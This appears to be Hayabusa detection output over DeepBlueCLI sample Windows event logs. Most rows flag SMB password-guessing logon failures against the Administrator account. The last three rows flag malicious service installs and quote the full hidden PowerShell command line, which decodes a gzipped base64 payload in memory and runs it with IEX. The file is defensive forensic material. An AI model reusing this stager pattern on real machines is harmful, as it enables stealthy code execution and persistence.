2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
